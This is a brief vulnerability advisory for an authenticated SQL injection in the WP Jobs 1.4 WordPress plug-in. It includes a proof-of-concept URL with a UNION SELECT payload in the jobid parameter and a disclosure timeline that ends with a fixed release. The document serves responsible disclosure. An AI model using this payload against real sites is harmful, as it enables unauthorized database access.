SQL injection vulnerability in the WP Jobs plug-in 1.4 for WordPress allows an authenticated user to execute arbitrary SQL commands via the jobid parameter.
Proof of Concept
In order to replay the attack, use the link below.
http://[wordpress_site]/wp-admin/edit.php?post_type=job&page=WPJobsJobApps&jobid=5 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL– comment
The results of the SQL injection are being reflected in the Email input field.
- 11/06/2017 – Identification of the Vulnerability
- 12/06/2017 – Speak with the developer
- 12/06/2017 – Request for CVE
- 12/06/2017 – Contact with WordPress
- 12/06/2017 – A new version of the plug-in has been released